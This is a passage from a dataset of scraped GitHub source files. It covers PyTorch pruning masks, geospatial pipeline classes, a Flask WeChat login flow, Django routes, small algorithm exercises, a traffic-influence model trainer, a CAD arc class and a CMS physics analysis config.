self.bias)\n\n\treturn x\n\ndef setup_net_for_mask(model):\n\n\t#same naming trick as before \n\tlayers = OrderedDict([*model.named_modules()])\n\n\tfor layer in layers.values():\n\t\tif isinstance(layer, nn.Conv2d):\n\t\t\tlayer.weight_mask = nn.Parameter(torch.ones_like(layer.weight))\n\t\t\tlayer.forward = types.MethodType(masked_conv2d_forward, layer)\n\t\telif isinstance(layer, nn.Linear):\n\t\t\tlayer.weight_mask = nn.Parameter(torch.ones_like(layer.weight))\n\t\t\tlayer.forward = types.MethodType(masked_linear_forward, layer)\n\t\t\t\ndef apply_mask(model,mask, zero_absent=True):\n\n\tlayers = OrderedDict([*model.named_modules()])\n\tsetup_net_for_mask(model)\n\n\t#mask may be structured, lets 'expand' it before applying it to the model\n\texpanded_mask = expand_structured_mask(mask,model)\n\n\tfor layer_name in expanded_mask:\n\t\tlayers[layer_name].weight_mask = nn.Parameter(expanded_mask[layer_name].to(layers[layer_name].weight.device))\n\tif zero_absent:\n\t\t#mask all layers not specified in the mask\n\t\tfor layer_name in layers:\n\t\t\tif layer_name not in expanded_mask.keys():\n\t\t\t\ttry:\n\t\t\t\t\tlayers[layer_name].weight_mask = nn.Parameter(torch.zeros_like(layers[layer_name].weight))\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\n\ndef expand_structured_mask(mask,model):\n\t'''Structured mask might have shape (filter, channel) for kernel structured mask, but the weights have\n\t\tshape (filter,channel,height,width), so we make a new weight wise mask based on the structured mask'''\n\n\tlayers = OrderedDict([*model.named_modules()])\n\texpanded_mask = OrderedDict()\n\n\tfor layer_name, layer_mask in mask.items():\n\t\tw = layers[layer_name].weight\n\t\tm = deepcopy(layer_mask)\n\t\twhile len(m.shape) < len(w.shape):\n\t\t\tm = m.unsqueeze(dim=-1)\n\t\tm = m.expand(w.shape)\n\t\texpanded_mask[layer_name] = m\n\t\n\treturn expanded_mask\n\n\ndef structured_mask_from_mask(mask, structure = 'kernels'):\n\t\n\tif isinstance(mask,dict):\n\t\tlayer_keys = list(mask.keys())\n\t\tmask_list = []\n\t\tfor i in mask:\n\t\t\tmask_list.append(mask[i])\n\t\tmask = mask_list\n\n\tif structure == 'weights':\n\t\traise ValueError(\"to create a weight mask use the function circuit_pruner.force.expand_structured_mask\")\n\tif structure not in ['kernels','edges','filters','nodes']:\n\t\traise ValueError(\"Argument 'structure' must be in ['weights','kernels','edges','filters','nodes']\")\n\n\n\n\tif len(mask[0].shape) == 4:\n\t\tin_structure = 'weights'\n\telif len(mask[0].shape) == 2:\n\t\tin_structure = 'kernels'\n\telif len(mask[0].shape) == 1:\n\t\tin_structure = 'filters'\n\telse:\n\t\traise ValueError(\"Dont understand Shape %s of input mask, must be 1,2 or 4 (filters,kernels,weights)\"%str(len(mask[0].shape)))\n\n\tif in_structure == structure:\n\t\tprint('provided mask already of structure %s'%structure)\n\t\treturn mask\n\n\tout_mask = []\n\n\tfor m in mask:\n\t\tif structure in ['filters','nodes']:\n\t\t\tm_flat = torch.reshape(m,(m.shape[0],-1))\n\t\t\tz = torch.zeros(m_flat.shape[1])\n\t\t\tm_out = ~torch.all(m_flat==z,dim=1)\n\n\t\telse:\n\t\t\tm_flat = torch.reshape(m,(m.shape[0]*m.shape[1],-1))\n\t\t\tz = torch.zeros(m_flat.shape[1])\n\t\t\tm_out = ~torch.reshape(torch.all(m_flat==z,dim=1),(m.shape[0],m.shape[1]))\n\n\t\tm_out= m_out.type(torch.FloatTensor)\n\t\tout_mask.append(m_out)\n\n\n\tout_mask_dict = OrderedDict()\n\tfor i in range(len(out_mask)):\n\t\tout_mask_dict[layer_keys[i]] = out_mask[i]\n\n\treturn out_mask\n\n\n\n\ndef mask_intersect_over_union(mask1,mask2):\n\tiou = {}\n\tfor layer_name in mask1:\n\t\ttry:\n\t\t\tintersect_mask = mask1[layer_name]*mask2[layer_name]\n\t\t\tunion_mask = torch.ceil((mask1[layer_name]+mask2[layer_name])/2)\n\t\t\tiou[layer_name] = (torch.sum(intersect_mask)/torch.sum(union_mask))\n\t\texcept:\n\t\t\tprint('skipping %s'%layer_name)\n\t\t\tcontinue\n\treturn iou\n\n","repo_name":"chrishamblin7/circuit_explorer","sub_path":"circuit_explorer/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18742092389","text":"import geopandas as gpd\nimport pandas as pd\nimport shapely.geometry\nimport shapely.wkt\n\nfrom .pipesegment import PipeSegment, LoadSegment, MergeSegment\nfrom ..vector.polygon import convert_poly_coords\n\n\nclass LoadString(LoadSegment):\n \"\"\"\n Load a string from a file.\n \"\"\"\n def __init__(self, pathstring):\n super().__init__()\n self.pathstring = pathstring\n def load(self):\n infile = open(self.pathstring, 'r')\n content = infile.read()\n infile.close()\n return content\n\n\nclass SaveString(PipeSegment):\n \"\"\"\n Write a string to a file.\n \"\"\"\n def __init__(self, pathstring, append=False):\n super().__init__()\n self.pathstring = pathstring\n self.append = append\n def transform(self, pin):\n mode = 'a' if self.append else 'w'\n outfile = open(self.pathstring, mode)\n outfile.write(str(pin))\n outfile.close()\n return pin\n\n\nclass ShowString(PipeSegment):\n \"\"\"\n Print a string to the screen.\n \"\"\"\n def transform(self, pin):\n print(pin)\n return pin\n\n\nclass LoadDataFrame(LoadSegment):\n \"\"\"\n Load a GeoPandas GeoDataFrame from a file.\n \"\"\"\n def __init__(self, pathstring, geom_col='geometry', projection=None):\n super().__init__()\n self.pathstring = pathstring\n self.geom_col = geom_col\n self.projection = projection\n def load(self):\n if self.pathstring.lower()[-4:] == '.csv':\n df = pd.read_csv(self.pathstring)\n geometry = df.apply(lambda row:\n shapely.wkt.loads(row[self.geom_col]), axis=1)\n df.drop(columns=[self.geom_col])\n gdf = gpd.GeoDataFrame(df, geometry=geometry)\n if self.projection is not None:\n gdf.crs = 'epsg:' + str(self.projection)\n return gdf\n else:\n return gpd.read_file(self.pathstring)\n\n\nclass SaveDataFrame(PipeSegment):\n \"\"\"\n Save a GeoPandas GeoDataFrame to disk.\n \"\"\"\n def __init__(self, pathstring, driver='GeoJSON'):\n super().__init__()\n self.pathstring = pathstring\n self.driver = driver\n def transform(self, pin):\n pin.to_file(self.pathstring, driver=self.driver)\n return pin\n\n\nclass ShowDataFrame(PipeSegment):\n \"\"\"\n Print a GeoPandas GeoDataFrame to the screen.\n \"\"\"\n def transform(self, pin):\n print(pin)\n return pin\n\n\nclass ReprojectDataFrame(PipeSegment):\n \"\"\"\n Reproject a GeoPandas GeoDataFrame.\n \"\"\"\n def __init__(self, projection=3857):\n super().__init__()\n self.projection = projection\n def transform(self, pin):\n return pin.to_crs('epsg:' + str(self.projection))\n\n\nclass ExplodeDataFrame(PipeSegment):\n \"\"\"\n Given a GeoPandas GeoDataFrame, break multi-part geometries\n into multiple lines.\n \"\"\"\n def transform(self, pin):\n return pin.explode().reset_index()\n\n\nclass IntersectDataFrames(PipeSegment):\n \"\"\"\n Given an iterable of GeoPandas GeoDataFrames, returns their intersection\n \"\"\"\n def __init__(self, master=0):\n super().__init__()\n self.master = master\n def transform(self, pin):\n result = pin[self.master]\n for i, gdf in enumerate(pin):\n if not i==self.master:\n result = gpd.overlay(result, gdf)\n result.crs = pin[self.master].crs\n return result\n\n\n#class DataFrameToMask(PipeSegment):\n# \"\"\"\n# Given a GeoPandas GeoDataFrame and an Image-class image,\n# convert the DataFrame to the corresponding Boolean mask\n# \"\"\"\n# pass\n#\n#\n#class MaskToDataFrame(PipeSegment):\n# \"\"\"\n# Given a boolean mask, convert it to a GeoPandas GeoDataFrame of polygons.\n# \"\"\"\n# pass\n\n\nclass DataFramePixelCoords(PipeSegment):\n \"\"\"\n Given a GeoPandas GeoDataFrame, converts between georeferenced\n coordinates and pixel coordinates. Assumes image has affine geotransform.\n \"\"\"\n def __init__(self, inverse=False, reverse_order=False, *args, **kwargs):\n super().__init__()\n self.inverse = inverse\n self.reverse_order = reverse_order\n self.args = args\n self.kwargs = kwargs\n def transform(self, pin):\n if not self.reverse_order:\n gdf = pin[0]\n img = pin[1]\n else:\n gdf = pin[1]\n img = pin[0]\n affine = img.metadata['geotransform']\n gdf = gdf.copy()\n newgeoms = gdf.apply(lambda row: convert_poly_coords(\n row.geometry, affine_obj=affine, inverse=self.inverse,\n *self.args, **self.kwargs\n ), axis=1)\n gdf.geometry = newgeoms\n return gdf\n\n\nclass DataFrameToString(PipeSegment):\n \"\"\"\n Given a GeoPandas GeoDataFrame, convert it into a GeoJSON string.\n Caveat emptor: This follows the GeoJSON 2016 standard, which does\n not include any coordinate reference system information.\n \"\"\"\n def __init__(self, crs=True, **kwargs):\n super().__init__()\n self.crs = crs\n self.kwargs = kwargs\n def transform(self, pin):\n geojson = pin.to_json(**(self.kwargs))\n if self.crs:\n geojson = '{\"type\": \"FeatureCollection\", \"crs\": { \"type\": \"name\", \"properties\": { \"name\": \"urn:ogc:def:crs:EPSG::' \\\n + str(pin.crs.to_epsg()) \\\n + '\" } }, ' \\\n + geojson[30:]\n return geojson\n\n\nclass BoundsToDataFrame(PipeSegment):\n \"\"\"\n Given a set of tile bounds [left, lower, right, upper],\n convert it to a GeoPandas GeoDataFrame. Note: User must\n specify projection, since a simple set of bounds doesn't\n include that.\n \"\"\"\n def __init__(self, projection=None):\n super().__init__()\n self.projection = projection\n def transform(self, pin):\n gdf = gpd.GeoDataFrame()\n if self.projection is not None:\n gdf.crs = 'epsg:' + str(self.projection)\n gdf.loc[0, 'geometry'] = shapely.geometry.box(*pin)\n return gdf\n","repo_name":"CosmiQ/solaris","sub_path":"solaris/preproc/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":402,"dataset":"github-code","pt":"61"} +{"seq_id":"37301099168","text":"from flask import current_app, render_template, redirect, flash, request,\\\n url_for, abort, make_response\nfrom app.flow import flow\nfrom app.flow.models import UserInfo\nfrom app import db, csrf\nfrom app.wechat.wechat_api import get_access_token_by_code,\\\n get_userinfo, auth_url\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\n\nfrom datetime import datetime\n\nimport uuid\nimport sys\nimport re\nreload(sys)\nsys.setdefaultencoding('utf8')\ncookies_dump_time = 24 * 60 * 60\nPHONE_PATTERN = re.compile(r'^1[0-9]{10}$')\n\n\n@csrf.exempt\n@flow.route('/flow/index/')\ndef flow_index():\n chn = request.args.get('chn', None)\n if current_app.config['OPEN_COUNT'] and chn:\n current_app.logger.info(\n 'chn:%s, ip:%s, actions:index' % (chn, request.remote_addr)\n )\n\n cookie_key = request.cookies.get(current_app.config['COOKIE_NAME'])\n cookie_data = cookies_loads(cookie_key)\n uid = None\n if cookie_data:\n uid = cookie_data.get('uid', None)\n if uid:\n user_info = UserInfo.query.filter(UserInfo.uid == uid).first()\n if user_info:\n return redirect(\n url_for('flow.click_get_flow', uid=uid, _external=True)\n )\n\n url = auth_url(\n current_app.config['APPID'],\n url_for('flow.flow_auth', _external=True),\n chn\n )\n return redirect(url)\n\n\n@csrf.exempt\n@flow.route('/flow/index/auth/')\ndef flow_auth():\n code = request.args.get('code', None)\n state = request.args.get('state', None)\n chn = state\n if current_app.config['OPEN_COUNT'] and chn:\n current_app.logger.info('chn:%s, ip:%s, actions:auth' % (\n chn,\n request.remote_addr\n ))\n\n if not code:\n return \"请授权\"\n\n token_msg = get_access_token_by_code(\n current_app.config['APPID'],\n current_app.config['WECHAT_SECRET'],\n code\n )\n # current_app.logger.info(str(token_msg))\n if 'e' in token_msg:\n current_app.logger.info(token_msg['e'])\n return '服务器连接错误'\n\n if 'errmsg' in token_msg:\n current_app.logger.info(token_msg['errmsg'])\n return token_msg['errmsg']\n\n access_token = token_msg['access_token']\n openid = token_msg['openid']\n expires_in = token_msg['expires_in']\n refresh_token = token_msg['refresh_token']\n scope = token_msg['scope']\n user_info = UserInfo.query.filter(UserInfo.openid == openid).first()\n uid = None\n if user_info:\n uid = user_info.uid\n else:\n userinfo_msg = get_userinfo(access_token, openid)\n if 'e' in userinfo_msg:\n current_app.logger.info(userinfo_msg['e'])\n return '服务器连接错误'\n\n if 'errmsg' in token_msg:\n current_app.logger.info(userinfo_msg['errmsg'])\n return userinfo_msg['errmsg']\n\n uid = str(uuid.uuid1()).replace('-', '')\n user_info = UserInfo()\n user_info.openid = userinfo_msg['openid']\n user_info.province = userinfo_msg['province']\n user_info.headimgurl = userinfo_msg['headimgurl']\n user_info.city = userinfo_msg['city']\n user_info.country = userinfo_msg['country']\n user_info.sex = userinfo_msg['sex']\n user_info.nickname = userinfo_msg['nickname']\n user_info.create_time = datetime.now()\n user_info.uid = uid\n user_info.mobile = 'o'\n db.session.add(user_info)\n db.session.commit()\n # current_app.logger.info(str(userinfo_msg))\n\n if uid:\n cookie_data = cookies_dumps({'uid': uid}, cookies_dump_time)\n response = make_response(redirect(url_for('flow.click_get_flow', uid=uid, _external=True)))\n response.set_cookie(\n current_app.config['COOKIE_NAME'],\n value=cookie_data,\n max_age=cookies_dump_time\n )\n return response\n else:\n return \"授权失败,请重试!\"\n\n\n@csrf.exempt\n@flow.route('/flow/index/click_get_flow/')\ndef click_get_flow():\n uid = request.args.get('uid')\n if uid:\n user_info = UserInfo.query.filter(UserInfo.uid == uid).first()\n if user_info:\n pass\n else:\n return '非授权用户'\n else:\n return '参数错误'\n\n return render_template('index_1.html', uid=uid)\n\n\n@flow.route('/flow/index/mobile/', methods=['GET', 'POST'])\ndef get_mobile():\n if request.method == 'GET':\n uid = request.args.get('uid')\n if uid:\n user_info = UserInfo.query.filter(UserInfo.uid == uid).first()\n if user_info:\n if user_info.mobile == 'o':\n return render_template('index_2.html', uid=uid)\n else:\n flow = get_flow_ans(user_info.uid)\n return render_template('index_3.html', flow=flow)\n else:\n abort(404)\n else:\n abort(404)\n elif request.method == 'POST':\n uid = request.form.get('uid')\n mobile = request.form.get('mobile')\n user = UserInfo.query.filter(UserInfo.uid == uid).first()\n if user:\n if user.mobile != 'o':\n # flash('已经填写过了手机')\n flow = get_flow_ans(user.uid)\n return render_template('index_3.html', flow=flow)\n else:\n if check_mobile(mobile):\n user.mobile = mobile\n db.session.add(user)\n db.session.commit()\n flow = get_flow_ans(user.uid)\n return render_template('index_3.html', flow=flow)\n else:\n flash(\"手机格式错误\")\n else:\n return flash(\"非授权用户\")\n\n return render_template('index_2.html', uid=uid)\n\n\ndef cookies_dumps(data, expires_in):\n s = Serializer(current_app.config['SECRET_KEY'], expires_in=expires_in)\n return s.dumps(data)\n\n\ndef cookies_loads(cookie):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(cookie)\n return data\n except:\n return None\n\n\ndef check_mobile(mobile):\n if mobile and PHONE_PATTERN.match(mobile):\n return True\n return False\n\n\ndef get_flow_ans(uid):\n # flow = get_rand_flow()\n return flow\n","repo_name":"xym2010/wechat_lottery","sub_path":"app/flow/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31113622906","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('signup/', views.signup, name='signup'),\n path('signin/', views.signin, name='signin'),\n path('logout/', views.logout, name='logout'),\n path('otherprofile//', views.other_profile, name='other_profile'),\n path('', views.userAccount, name='profile'),\n]","repo_name":"adil-shabab/behance-clone","sub_path":"behance/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"23394920891","text":"def is_palindrome(string):\r\n \"\"\" (string) -> bool\r\n Return true if string is a palindrome\r\n\r\n >>> is_palindrome(\"a\")\r\n True\r\n\r\n >>> is_palindrome(\"abc\")\r\n False\r\n\r\n >>> is_palindrome(\"aba\")\r\n True\r\n \"\"\"\r\n if len(string) == 0:\r\n return False\r\n if len(string) == 1:\r\n return True\r\n if len(string) == 2 or len(string) == 3:\r\n return string[0] == string[-1]\r\n\r\n return is_palindrome(string[1:-1])\r\n\r\n\r\ndef fair_and_sqare(A, B):\r\n \"\"\" (num, num) -> int\r\n For numbers between A and B return the number of fair and square\r\n numbers (number is a palindrome and its square root is a palindrome)\r\n greater or equal to A and smaller or equal than B.\r\n\r\n >>> fair_and_sqare(1, 4)\r\n 2\r\n\r\n >>> fair_and_sqare(10, 120)\r\n 0\r\n\r\n >>> fair_and_sqare(100, 1000)\r\n 2\r\n \"\"\"\r\n counter = 0\r\n for i in range(A, B+1):\r\n if is_palindrome(str(i)):\r\n root = i**0.5\r\n if root == int(root) and is_palindrome(str(int(root))):\r\n counter += 1\r\n return counter\r\n\r\nif __name__ == '__main__':\r\n in_f = open(\"input.txt\", \"r\")\r\n out_f = open(\"output.txt\", \"w\")\r\n test_cases = int(in_f.readline())\r\n for case in range(test_cases):\r\n limits = in_f.readline().split()\r\n result = fair_and_sqare(int(limits[0]), int(limits[1]))\r\n out_f.write(\"Case #%d: %d\\n\" % (case+1, result))\r\n\r\n in_f.close()\r\n out_f.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2505.py","file_name":"2505.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28431380933","text":"#%%\r\ndef my_busqueda (lista, e):\r\n aux = -1\r\n for i in range(len(lista)):\r\n if lista[i] == e:\r\n aux = i\r\n return aux\r\n\r\n#%%\r\ndef busqueda_lineal(lista, e):\r\n\r\n pos = -1 # comenzamos suponiendo que e no está\r\n for i, z in enumerate(lista): # recorremos la lista\r\n if z == e: # si encontramos a e\r\n pos = i # guardamos su posición\r\n break # y salimos del ciclo\r\n return pos\r\n#%%\r\nlista = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\ne = 5\r\nindicie = busqueda_lineal(lista, e)\r\nprint(indicie)\r\n# %%\r\n","repo_name":"lpangaro/python-UNSAM","sub_path":"Notas/ejercicios_python/Clase04/otros/Buscar.py","file_name":"Buscar.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43498837582","text":"import numpy as np\nimport os\nfrom environments.TrafficGrid.prediction import model\nimport pylab\nimport pandas as pd\nfrom environments.TrafficGrid.IALM import IALM\nfrom environments.TrafficGrid.utility import generate_d_set\n\nnp.random.seed(42)\n\nclass Approximator(object):\n\n def __init__(self, env, parameters, policies):\n\n self.parameters=parameters\n self.env=env\n self.D=self.generate_d_set()\n self.policies=policies\n \n\n def train(self):\n n_epochs=self.parameters['n_epochs']\n batch_size=self.parameters['batch_size']\n n_iter=self.parameters['n_iter']\n #frac_epochs=self.parameters['frac_epochs']\n\n # Create the dataset (n_iter x hor x dimension of d_set) and the labels (n_iter x hor)\n data=self.env.extract_d_set()\n labels=self.env.extract_sources_influence()\n \n self.model = model(self.parameters)\n \n data=np.array(data)\n labels=np.array(labels)\n\n #Select randomly train_test_split of the experience as train set and the rest as test set\n indexes=np.arange(len(data))\n np.random.shuffle(indexes)\n indexes_train=indexes[:int(self.parameters['train_test_split']*n_iter)]\n indexes_test=indexes[int(self.parameters['train_test_split']*n_iter):]\n\n train_x = data[indexes_train]\n train_lab = labels[indexes_train]\n\n test_x = data[indexes_test]\n test_lab = labels[indexes_test]\n\n total_batches = len(train_x) // batch_size\n loss = np.zeros(n_epochs)\n\n for epoch in range(n_epochs):\n loss_epoch=0\n for b in range(total_batches):\n index=b*batch_size\n batch_x=train_x[index:index+batch_size]\n batch_lab=train_lab[index:index+batch_size]\n batch={'batch_x':batch_x,'labels':batch_lab}\n loss_step, pred_lab =self.model.update(batch)\n loss_epoch+=loss_step\n loss_epoch=loss_epoch/total_batches\n loss[epoch]=loss_epoch\n\n #pylab.figure()\n #pylab.plot(loss)\n #pylab.xlabel('Epochs')\n #pylab.ylabel('Loss')\n #pylab.title('Average Loss')\n #pylab.savefig('Results/TrainingLoss.jpg')\n #pylab.show()\n\n \n \n def train_error(self):\n n_epochs=self.parameters['n_epochs']\n batch_size=self.parameters['batch_size']\n n_iter=self.parameters['n_iter']\n frac_epochs=self.parameters['frac_epochs']\n #frac_epochs=(n_epochs-1)/n_VI\n\n\n # Create the dataset (n_iter x hor x dimension of d_set) and the labels (n_iter x hor)\n data=self.env.extract_d_set()\n labels=self.env.extract_sources_influence()\n #build the network\n self.model = model(self.parameters)\n \n data=np.array(data)\n labels=np.array(labels)\n\n #Select train_test_split of the experience as train set and the rest as test set\n indexes=np.arange(len(data))\n #np.random.shuffle(indexes)\n indexes_train=indexes[:int(self.parameters['train_test_split']*n_iter)]\n indexes_test=indexes[int(self.parameters['train_test_split']*n_iter):]\n train_x = data[indexes_train]\n train_lab = labels[indexes_train]\n test_x = data[indexes_test]\n test_lab = labels[indexes_test]\n \n total_batches = len(train_x) // batch_size\n loss = np.zeros(n_epochs)\n loss_1=np.zeros([n_epochs,2])\n\n CE=[]\n N1=[]\n V=[]\n \n\n #Build the exact influence IALM where to evaluate the performances of the approximate-influence optimal policy\n #Exact_IALM=IALM(self.parameters,Exact_I)\n \n for epoch in range(n_epochs):\n loss_epoch=0\n loss_epoch_1=np.array([0,0])\n\n #Compute the approximate influence given the current state of the network\n #Approx_I is a len=hor list. dim(Approx_I[t])=dim(d_set_t) x dim(sources_influence)\n if epoch%frac_epochs==0:\n # if epoch==n_epochs-1:\n # verb=1\n # else:\n # verb=0\n #len(Approx_I)=hor np.shape(Approx_I[t])= n_dsets[t] x n_inf_sourse(2) x n_values_inf_sources(2) \n Approx_I=self.approximate_influence()\n\n #Build the approximat influence IALM\n IALM_traffic=IALM(self.parameters, Approx_I)\n\n #Compute the Approx_I optimal policy\n Pi=IALM_traffic.value_iteration()\n\n #Compute the value of the Approx_I optimal policy in the Exact_I IALM\n V.append(IALM_traffic.evaluate_IALM_policy(1000, Pi, self.policies[1:]))\n \n #Evaluate the performances of the network\n cross_entropy, norm_1=self.model.evaluate(test_x,test_lab)\n\n CE.append(cross_entropy)\n N1.append(norm_1)\n\n #Training step\n for b in range(total_batches):\n index=b*batch_size\n batch_x=train_x[index:index+batch_size]\n batch_lab=train_lab[index:index+batch_size]\n batch={'batch_x':batch_x,'labels':batch_lab}\n loss_step, loss_1_step, pred_lab =self.model.update(batch)\n loss_epoch_1=loss_1_step+loss_epoch_1\n loss_epoch+=loss_step\n\n loss_1[epoch]=loss_epoch_1/total_batches\n \n loss_epoch=loss_epoch/total_batches\n loss[epoch]=loss_epoch\n\n '''\n pylab.figure()\n pylab.plot(loss)\n pylab.xlabel('Epochs')\n pylab.ylabel('Loss')\n pylab.title('Average Loss')\n pylab.savefig('Results/TrainingLoss.jpg')\n #pylab.show()\n\n pylab.figure()\n pylab.plot(loss_1[:,0])\n pylab.xlabel('Epochs')\n pylab.ylabel('Loss')\n pylab.title('Average Loss east')\n pylab.savefig('Results/TrainingLoss.jpg')\n\n pylab.figure()\n pylab.plot(loss_1[:,1])\n pylab.xlabel('Epochs')\n pylab.ylabel('Loss')\n pylab.title('Average Loss north')\n pylab.savefig('Results/TrainingLoss.jpg')\n pylab.show()\n '''\n return N1, CE, V, loss\n\n\n def generate_d_set(self):\n\n D=np.zeros([4**self.parameters['hor'],self.parameters['hor'],2])\n for i in range(4**self.parameters['hor']):\n D_set = \"{0:b}\".format(i)\n D_set = np.array([int(j) for j in D_set])\n while(len(D_set)<2*self.parameters['hor']):\n D_set=np.insert(D_set,0,0,axis=0)\n D_set=np.reshape(D_set,[self.parameters['hor'],2])\n D[i]=D_set\n\n return D\n\n def approximate_influence(self):\n \t#Compute the approximate_influence for any D_set\n I=[]\n influences=self.model.predictions(self.D)\n #print('around[0,1]',influences[198][0][0])\n\n for t in np.arange(self.parameters['hor']-1,-1, step=-1):\n n_dsets=4**(t+1)\n rev_index=self.parameters['hor']-t-1\n I.append(np.zeros((n_dsets,2,2)))\n indexes=np.arange(0,4**self.parameters['hor'], step=4**rev_index)\n\n I[rev_index]=influences[indexes,t]\n \n I.reverse()\n return I\n \n\n\n\n","repo_name":"INFLUENCEorg/Approx-IBA-Planning","sub_path":"environments/TrafficGrid/experimentor.py","file_name":"experimentor.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14633136281","text":"#!/usr/bin/env python\nfrom math import *\nfrom od_utils import *\nfrom od_model import *\n\ndef force_creation(i, pb1, pb2, r1, r2, stiffness=None):\n\t###create forces\n\tangle = pi/180.0*i*60.0\n\tposition1 = [cos(angle)*r1, 0.0, sin(angle)*r1 ]\n\tposition2 = [cos(angle)*r2, 0.0, sin(angle)*r2 ]\n\ti_mar = od_marker(\"imarker_\"+str(i))\n\ti_mar.set(\"Position\", position1)\n\tpb1.adding(i_mar)\n\tj_mar = od_marker(\"jmarker_\"+str(i))\n\tj_mar.set(\"Position\", position2)\n\tpb2.adding(j_mar)\n\tspdp = od_spdpt(\"spdp\"+str(i))\n\tspdp.set_imarker(i_mar, pb1)\n\tspdp.set_jmarker(j_mar, pb2)\n\tif stiffness is None: stiffness = 10.0\n\tspdp.set(\"Stiffness\", stiffness)\n\tspdp.set(\"Damping\", 0.0)\n\tspdp.set(\"Distance\", 2.0)\n\treturn spdp\n\t\n\t\ndef model_create():\n\t###this fucntion is to create a model with a plate supported by 6 SPDPs###\n\t\t\t#crerate plate \n\t\t\tmodel = Od_model()\n\t\t\tmodel.add_ground()\n\t\t\tground = model.ground()\n\t\t\tplate = od_body(\"platform\")\n\t\t\tplate.set(\"Position\", [0.0, 1.0, 0])\n\t\t\tplate.set(\"Ref_Orientation\", [0.0, 90.0, 0.0])\n\t\t\tmodel.adding(plate)\n\t\t\t#disc\n\t\t\tplate.adding(od_cylinder(1.0, 1.0, .1))\n\t\t\tfor i in range(6):\n\t\t\t\t force = force_creation(i, plate, ground, 1.0, 2.0, 1000.0)\n\t\t\t\t model.adding(force)\n\t\t\treturn model\n\t\t\t\t\nif __name__ == \"__main__\":\n _model = model_create()\n setModel(_model)\t\t\t\n\n\t\t\t\n","repo_name":"utbeaver/obdyn_old","sub_path":"wb/plate_6force.py","file_name":"plate_6force.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17455182876","text":"class CGLibPy_Arc(object):\n centrePt = None\n startPt = None\n endPt = None\n radius = 0.0\n startAng = 0.0\n endAng = 0.0\n sweepAng = 0.0\n fullCircle = False\n CCW = True\n\n def __init__(self,*args):\n if len(args) == 3: #Circle - Centre, radius, Orientation\n self.centrePt = args[0]\n self.radius = args[1]\n self.CCW = args[2]\n self.fullCircle = True\n elif len(args) == 5: #Arc - Centre, Start Pt, End Pt, radius, Orientation\n self.centrePt = args[0]\n self.startPt = args[1]\n self.endPt = args[2]\n self.radius = args[3]\n self.CCW = args[4]\n\n def translateBy(self,dx,dy,dz):\n if self.startPt != None and self.endPt != None:\n self.startPt.translateBy(dx,dy,dz)\n self.endPt.translateBy(dx,dy,dz)\n self.centrePt.translateBy(dx,dy,dz)\n\n def transformBy(self,transF):\n if self.startPt != None and self.endPt != None:\n self.startPt.transformBy(transF)\n self.endPt.transformBy(transF)\n self.centrePt.transformBy(transF)\n \n","repo_name":"rhtbapat/CGLibPy","sub_path":"CGLibPy/CGLibPy_Arc.py","file_name":"CGLibPy_Arc.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"5728822024","text":"from fractions import Fraction\ndef chkPrime(a):\n for i in range(2, int(a ** 0.5) + 1):\n if a % i == 0:\n return 0\n return 1\ndef solution(a, b):\n answer = 1\n tmp = Fraction(a, b).denominator\n tmpst = set()\n for i in range(2, tmp + 1):\n if tmp % i == 0 and chkPrime(i) == 1:\n tmpst.add(i)\n if len(tmpst) > 2:\n answer = 2\n elif len(tmpst) == 2:\n if 2 not in tmpst or 5 not in tmpst:\n answer = 2\n elif len(tmpst) == 1:\n if 2 not in tmpst and 5 not in tmpst:\n answer = 2\n return answer","repo_name":"lynever/prac_programmars","sub_path":"프로그래머스/lv0/120878. 유한소수 판별하기/유한소수 판별하기.py","file_name":"유한소수 판별하기.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1187171217","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\n\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use\n fileNames = cms.untracked.vstring(\n 'file:/uscms/home/shalhout/no_backup/patTuple_testing.root'\n )\n)\n\n#process.demo = cms.EDAnalyzer('ElectronTestAnalysis'\n#)\n\n\nprocess.demo = cms.EDAnalyzer('TestTriggerAna',\nelectronSrc = cms.untracked.InputTag(\"cleanPatElectrons\"),\nmuonSrc = cms.untracked.InputTag(\"cleanPatMuons\"),\ntauSrc = cms.untracked.InputTag(\"cleanPatTaus\"),\ntriggerEventSrc = cms.untracked.InputTag(\"patTriggerEvent\"),\neTrigMatchEle20Src = cms.untracked.string(\"eTrigMatchEle20\"),\neTrigMatchEle22Src = cms.untracked.string(\"eTrigMatchEle22\"),\neTrigMatchEle27Src = 